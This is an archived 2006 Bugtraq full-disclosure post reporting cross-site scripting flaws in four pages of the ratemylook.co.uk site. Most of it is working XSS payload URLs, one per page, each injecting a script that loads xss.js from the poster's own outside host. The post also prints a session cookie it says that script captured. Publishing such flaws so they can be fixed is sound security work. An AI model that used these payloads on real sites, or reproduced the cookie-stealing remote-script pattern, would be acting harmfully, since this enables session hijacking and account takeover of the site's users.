lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060613100102.11886.qmail@securityfocus.com> Date: 13 Jun 2006 10:01:02 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: Ratemylook.co.uk - XSS with session disclosure Ratemylook.co.uk Homepage: http://www.ratemylook.co.uk Affected files: user.php4 top.php4 hot.php4 toponline.php4 ------------------------------------------------ user.php4 XSS vuln with cookie disclosure: http://www.ratemylook.co.uk/user.php4?uid=1150190681&mode=own">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<" Screenshots: http://www.youfucktard.com/xsp/ratemylook1.jpg http://www.youfucktard.com/xsp/ratemylook2.jpg -------------------------------------------------- top.php4 xss with cookie disclosure: http://www.ratemylook.co.uk/top.php4?topshow=female&top=60&mode=top">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<" Screenshots: http://www.youfucktard.com/xsp/ratemylook3.jpg http://www.youfucktard.com/xsp/ratemylook4.jpg ------------------------------------------------ hot.php4 XSS vuln with cookie disclosure: http://www.ratemylook.co.uk/hot.php4?topshow=female&top=20&mode=hot">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<" ------------------------------------------------- toponline.php4 XSSvulnwith cookie disclosure: http://www.ratemylook.co.uk/toponline.php4?topshow=female&top=40&mode=online">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<" Our cookie: This is remote text via xss.js located at youfucktard.com sid=fe0f38046fa4e406949c61c9650e923e; __utma=77460758.124649130.1150190458.1150190458.1150190458.1; __utmb=77460758; __utmc=77460758; __utmz=77460758.1150190458.1.1.utmccn=(referral)|utmcsr=allpictureratingsites.com|utmcct=/cgi-bin/jump2.cgi|utmcmd=referral